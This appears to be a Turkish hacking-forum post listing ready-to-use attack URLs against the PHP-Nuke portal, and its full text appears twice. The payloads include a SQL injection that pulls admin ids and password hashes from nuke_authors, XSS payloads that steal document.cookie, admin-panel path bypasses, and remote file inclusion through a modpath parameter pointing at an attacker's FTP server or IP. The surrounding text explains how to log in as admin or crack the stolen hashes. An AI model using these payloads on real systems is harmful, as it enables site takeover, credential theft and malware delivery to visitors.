önizleme moduna saldırı
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=ahttp://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a[/URL]
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</scripthttp://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script[/URL]>
http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy
Saygılar...
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=ahttp://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a[/URL]
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</scripthttp://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script[/URL]>
http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy
Saygılar...